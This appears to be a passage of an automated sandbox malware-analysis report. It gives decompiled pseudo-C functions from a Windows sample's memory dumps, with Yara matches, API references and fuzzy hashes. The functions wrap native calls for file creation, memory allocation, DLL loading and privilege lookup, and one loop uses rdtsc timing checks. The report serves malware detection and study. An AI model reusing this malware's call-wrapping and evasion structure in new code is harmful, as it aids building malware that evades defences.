                                                  • API String ID: 2738559852-2859176346
                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E00409B50(void* __eflags, intOrPtr _a4, signed char _a8, signed int _a1783756873) {
                                                  				char* _v8;
                                                  				char _v12;
                                                  				intOrPtr _v16;
                                                  				char _v536;
                                                  				signed int _v1957628863;
                                                  				void* _t16;
                                                  				intOrPtr _t18;
                                                  				intOrPtr _t19;
                                                  				signed char _t23;
                                                  				intOrPtr _t26;
                                                  				intOrPtr* _t27;
                                                  				WCHAR* _t28;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				void* _t31;
                                                  
                                                  				_t23 = _a8;
                                                  				_v8 =  &_v536;
                                                  				_t16 = E0041AF60( &_v12, 0x104, _t23);
                                                  				_t30 = _t29 + 0xc;
                                                  				if(_t16 != 0) {
                                                  					_t18 = E0041B380(__eflags, _v8);
                                                  					_t31 = _t30 + 4;
                                                  					__eflags = _t18;
                                                  					if(_t18 != 0) {
                                                  						_t23 =  &_v12;
                                                  						E0041B600(_t23, 0);
                                                  						_t31 = _t31 + 8;
                                                  					}
                                                  					_t19 = E00419710(_v8);
                                                  					_v16 = _t19;
                                                  					__eflags = _t19;
                                                  					if(_t19 == 0) {
                                                  						_t26 = _a4;
                                                  						_v1957628863 = _v1957628863 | _t23;
                                                  						_t27 = _t26 + 1;
                                                  						_a1783756873 = _a1783756873 | _t23;
                                                  						 *_t27 =  *_t27 + _t23; // executed
                                                  						__eflags =  *_t27;
                                                  						LdrLoadDll(_t28); // executed
                                                  						return _v16;
                                                  					}
                                                  					return _t19;
                                                  				} else {
                                                  					return _t16;
                                                  				}
                                                  			}



















                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction ID: 6c7918579f63920fb86cd593affe8adf5c0c2a6eede5319f465e69fff998d711
                                                  • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction Fuzzy Hash: 140152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E004185CD(signed int __edx, void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                  				signed int _v117;
                                                  				long _t23;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  
                                                  				asm("outsd");
                                                  				_t36 = __esi + 1;
                                                  				_v117 = _v117 | __edx;
                                                  				_t17 = _a4;
                                                  				_push(_t36);
                                                  				_t5 = _t17 + 0xc40; // 0xc40
                                                  				E004191D0(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                  				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                  				return _t23;
                                                  			}







                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 0a67e275fad455a823b6bea61b574d82cbc13e5cc1272e150d64dac4ed2129eb
                                                  • Instruction ID: 49515680b58282798ea0772b140264028f67580a444d1368a2ea55559255b12e
                                                  • Opcode Fuzzy Hash: 0a67e275fad455a823b6bea61b574d82cbc13e5cc1272e150d64dac4ed2129eb
                                                  • Instruction Fuzzy Hash: 0801AFB2241108AFCB48CF98DC95EEB77A9AF8C354F158249FA0DD7251C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                  				long _t21;
                                                  				void* _t31;
                                                  
                                                  				_t3 = _a4 + 0xc40; // 0xc40
                                                  				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                  				return _t21;
                                                  			}





                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041861D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E004187AA(void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                  				long _t16;
                                                  				void* _t24;
                                                  
                                                  				 *0xFFFFFFFF8673B77C =  *((intOrPtr*)(0xffffffff8673b77c)) - __edx;
                                                  				_push(0x8673b7f1);
                                                  				_t12 = _a4;
                                                  				_t5 = _t12 + 0xc60; // 0xca0
                                                  				E004191D0(_t24, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                  				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                  				return _t16;
                                                  			}





                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 8a759e3010c769c28920cbdc0a5188e274fdd532e813e23b66d2c7c8647d2de9
                                                  • Instruction ID: 0a50da642d5d52293ca8a7392c608b6c5b5d399a194d9c596a7921e5dd8f9810
                                                  • Opcode Fuzzy Hash: 8a759e3010c769c28920cbdc0a5188e274fdd532e813e23b66d2c7c8647d2de9
                                                  • Instruction Fuzzy Hash: D5F082712001087FCB14DF99CC84EEB77A9EF88340F14424DFE0997241C130E810CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                  				long _t14;
                                                  				void* _t21;
                                                  
                                                  				_t3 = _a4 + 0xc60; // 0xca0
                                                  				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                  				return _t14;
                                                  			}





                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 004187E9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E004186FA(void* __eax, void* __ebx, void* _a4) {
                                                  				intOrPtr _v0;
                                                  				long _t10;
                                                  				void* _t15;
                                                  
                                                  				_push(0xffffffad);
                                                  				asm("rcl byte [ebp-0x75], cl");
                                                  				_t7 = _v0;
                                                  				_t3 = _t7 + 0x10; // 0x300
                                                  				_t4 = _t7 + 0xc50; // 0x409773
                                                  				E004191D0(_t15, _v0, _t4,  *_t3, 0, 0x2c);
                                                  				_t10 = NtClose(_a4); // executed
                                                  				return _t10;
                                                  			}






                                                  APIs
                                                  • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 5d0704b7dd65259211e0e24f0b18fce230db1598119a02642a62daeed227a0aa
                                                  • Instruction ID: 83035b151df51b8d981c95ac6b822e10becf360a049b9f016f9320289211e9a0
                                                  • Opcode Fuzzy Hash: 5d0704b7dd65259211e0e24f0b18fce230db1598119a02642a62daeed227a0aa
                                                  • Instruction Fuzzy Hash: A6E086352051147FE710DBB5CC49EDB7F68DF45260F184699F9599B682C130A500C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00418700(intOrPtr _a4, void* _a8) {
                                                  				long _t8;
                                                  				void* _t11;
                                                  
                                                  				_t5 = _a4;
                                                  				_t2 = _t5 + 0x10; // 0x300
                                                  				_t3 = _t5 + 0xc50; // 0x409773
                                                  				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                  				_t8 = NtClose(_a8); // executed
                                                  				return _t8;
                                                  			}





                                                  APIs
                                                  • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418725
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c61887d11b720f10791fdf9876c8feffbf34e7d7543ebf01d80d5540fbae4740
                                                  • Instruction ID: 831ee23c1682f032a8af1654e37081e19b7904b52a655b2666c86ae04ffcbe4f
                                                  • Opcode Fuzzy Hash: c61887d11b720f10791fdf9876c8feffbf34e7d7543ebf01d80d5540fbae4740
                                                  • Instruction Fuzzy Hash: 4A90026260100902E20171A95414616000A97D0381F91C032A1014559ECAA58992F171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 28aceb3f32cbcf38a3fac0a02780533a399a0411b5f6f850914b2161c5bd968d
                                                  • Instruction ID: 3fa2dd25746b80344bcb69030eaa80a7ca66f50796607755a9ac5963d7771598
                                                  • Opcode Fuzzy Hash: 28aceb3f32cbcf38a3fac0a02780533a399a0411b5f6f850914b2161c5bd968d
                                                  • Instruction Fuzzy Hash: 7990026230100403E24071A964286064005E7E1341F51D021E0404558CD9958856A262
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 98603ce13a989b81b7187703dd92c33779f76149826cd4abcb87f4403f9c0c8d
                                                  • Instruction ID: 4b9a723e65b19f277defb13c8139839f6a212c51196f10b37fcc15e41e285044
                                                  • Opcode Fuzzy Hash: 98603ce13a989b81b7187703dd92c33779f76149826cd4abcb87f4403f9c0c8d
                                                  • Instruction Fuzzy Hash: 4B90027231114802E21061A99414706000597D1341F51C421A081455CD86D58891B162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8008a72402e1e00ad90917caf5f76f7940b1a9e5739181f2330b2a7d43d1adc6
                                                  • Instruction ID: efcbb8eb1554506b9cc118147749bd83eda00d615d10edd896e35b51a624c191
                                                  • Opcode Fuzzy Hash: 8008a72402e1e00ad90917caf5f76f7940b1a9e5739181f2330b2a7d43d1adc6
                                                  • Instruction Fuzzy Hash: CB90027220100802E20065E96418646000597E0341F51D021A5014559EC6E58891B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E004088E0(intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				char _v24;
                                                  				char _v284;
                                                  				char _v804;
                                                  				char _v840;
                                                  				void* _t24;
                                                  				void* _t31;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t39;
                                                  				void* _t50;
                                                  				intOrPtr _t52;
                                                  				void* _t53;
                                                  				void* _t54;
                                                  				void* _t55;
                                                  				void* _t56;
                                                  
                                                  				_t52 = _a4;
                                                  				_t39 = 0; // executed
                                                  				_t24 = E00406E30(_t52,  &_v24); // executed
                                                  				_t54 = _t53 + 8;
                                                  				if(_t24 != 0) {
                                                  					E00407040( &_v24,  &_v840);
                                                  					_t55 = _t54 + 8;
                                                  					do {
                                                  						E0041A0E0( &_v284, 0x104);
                                                  						E0041A750( &_v284,  &_v804);
                                                  						_t56 = _t55 + 0x10;
                                                  						_t50 = 0x4f;
                                                  						while(1) {
                                                  							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
                                                  							_t56 = _t56 + 0x10;
                                                  							if(_t31 != 0) {
                                                  								break;
                                                  							}
                                                  							_t50 = _t50 + 1;
                                                  							if(_t50 <= 0x62) {
                                                  								continue;
                                                  							} else {
                                                  							}
                                                  							goto L8;
                                                  						}
                                                  						_t9 = _t52 + 0x14; // 0xffffe1a5
                                                  						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                  						_t39 = 1;
                                                  						L8:
                                                  						_t33 = E00407070( &_v24,  &_v840);
                                                  						_t55 = _t56 + 8;
                                                  					} while (_t33 != 0 && _t39 == 0);
                                                  					_t34 = E004070F0(_t52,  &_v24); // executed
                                                  					if(_t39 == 0) {
                                                  						asm("rdtsc");
                                                  						asm("rdtsc");
                                                  						_v8 = _t34 - 0 + _t34;
                                                  						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                  					}
                                                  					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                  					_t20 = _t52 + 0x31; // 0x5608758b
                                                  					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                  					return 1;
                                                  				} else {
                                                  					return _t24;
                                                  				}
                                                  			}




















                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                  • Instruction ID: fecb9998d56daf9cfaa78a55d0f1ea928f7019af28acdd4276aec55bf8742b64
                                                  • Opcode Fuzzy Hash: 9d06256989bfe96ad7de7a63f8bdf9db14966219433187ebea19fabadcfe590e
                                                  • Instruction Fuzzy Hash: 4C212BB2D4020857CB10E6649E42BFF736C9B50304F04017FE989A2181F639AB498BA7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                  				void* _t10;
                                                  				void* _t15;
                                                  
                                                  				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                  				_t6 =  &_a8; // 0x413546
                                                  				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                  				return _t10;
                                                  			}






                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID: F5A
                                                  • API String ID: 1279760036-683449296
                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                  • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E00418912(signed int __eax, int _a4, void* _a12, long _a16, void* _a20) {
                                                  				intOrPtr _v0;
                                                  				intOrPtr* __esi;
                                                  				void* __ebp;
                                                  				void* _t11;
                                                  				char _t14;
                                                  				void* _t15;
                                                  				void* _t19;
                                                  
                                                  				_t11 = (__eax ^ 0x00000093) + 0x658b8b33;
                                                  				if(_t11 <= 0) {
                                                  					asm("aam 0x94");
                                                  					_push(cs);
                                                  					asm("loope 0x53");
                                                  					__ebp = __esp;
                                                  					__eax = _v0;
                                                  					_push(__esi);
                                                  					__esi = _v0 + 0xc7c;
                                                  					__eax =  *__esi;
                                                  					ExitProcess(_a4);
                                                  				}
                                                  				_t1 = _t11 + 0xc74; // 0xc74
                                                  				E004191D0(_t19, _t11, _t1, _t15, 0, 0x35);
                                                  				_t14 = RtlFreeHeap(_a12, _a16, _a20); // executed
                                                  				return _t14;
                                                  			}











                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitFreeHeapProcess
                                                  • String ID:
                                                  • API String ID: 1180424539-0
                                                  • Opcode ID: 1bd17018bf3751b5ddc4f80b9c52cfd3abdeb7b5da4c5737e4c2d79714466e40
                                                  • Instruction ID: 5bbea642e4930f668c253bd3f61725241b77efc139e8b990d7dc8e7bd443b416
                                                  • Opcode Fuzzy Hash: 1bd17018bf3751b5ddc4f80b9c52cfd3abdeb7b5da4c5737e4c2d79714466e40
                                                  • Instruction Fuzzy Hash: AC113AB22002097BDB14DFA9DC85EEB77ACAF8C750F058659FA0C97241D634E911CBB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                  • Instruction ID: a55241834724a4f9522fcddb18cdf12f322e24b5025e529ea1e7499cfe7347ca
                                                  • Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                  • Instruction Fuzzy Hash: 88018431A8022876E721BA959C03FFF776C5B00B55F14015AFF04BA1C2E6A8790586FA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 2c5ab5e332fffdf23ba65a94d8a9c2121684a943267598d725fac98cac4351bc
                                                  • Instruction ID: 574bf865cb3a9c5b0f28379c8701a5991f5030ebe1d1f7c3a8d9e9f1a4985c1d
                                                  • Opcode Fuzzy Hash: 2c5ab5e332fffdf23ba65a94d8a9c2121684a943267598d725fac98cac4351bc
                                                  • Instruction Fuzzy Hash: 8FF0A031B9022432E22119956D03FFB66999B80F11F04006EFF04AA2C1EAA8691542E6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 19%
                                                  			E004188D2(signed int __eax, void* __edi, char _a4, void* _a8, long _a12, void* _a16) {
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				intOrPtr* _t14;
                                                  
                                                  				if((__eax | 0x000000f2) >= 0) {
                                                  					_t10 =  *((intOrPtr*)( *_t14))(_t12, _t11); // executed
                                                  					return _t10;
                                                  				} else {
                                                  					asm("std");
                                                  					asm("ror byte [ecx+0x55], 0x8b");
                                                  					__ebp = __esp;
                                                  					__eax = _a4;
                                                  					_t3 = __eax + 0xc74; // 0xc74
                                                  					__esi = _t3;
                                                  					__eax = _a12;
                                                  					__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                  					__esi = __esi;
                                                  					__ebp = __ebp;
                                                  					return __eax;
                                                  				}
                                                  			}










                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: b0d06c5f21200ef33afe594529470be69220bd7c25d57f3c5238cfae6c87fd47
                                                  • Instruction ID: 0e64c00c1ce613f1af75d3174b2d769ea92e3ed21bc24d3472f3b19191c9be4a
                                                  • Opcode Fuzzy Hash: b0d06c5f21200ef33afe594529470be69220bd7c25d57f3c5238cfae6c87fd47
                                                  • Instruction Fuzzy Hash: C9F0E2B12002046FEB18DFA8DC48EEB37A8EF89324F104A4EFD5C87251C231E951CAA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                  				intOrPtr _t7;
                                                  				char _t10;
                                                  				intOrPtr _t11;
                                                  				void* _t15;
                                                  
                                                  				_t7 = _a4;
                                                  				_t11 =  *((intOrPtr*)(_t7 + 0x10));
                                                  				_t3 = _t7 + 0xc74; // 0xc74
                                                  				E004191D0(_t15, _t7, _t3, _t11, 0, 0x35);
                                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                  				return _t10;
                                                  			}








                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                  				int _t10;
                                                  				void* _t15;
                                                  
                                                  				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                  				return _t10;
                                                  			}






                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00418920(intOrPtr _a4, int _a8) {
                                                  				void* _t10;
                                                  
                                                  				_t5 = _a4;
                                                  				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                  				ExitProcess(_a8);
                                                  			}





                                                  APIs
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
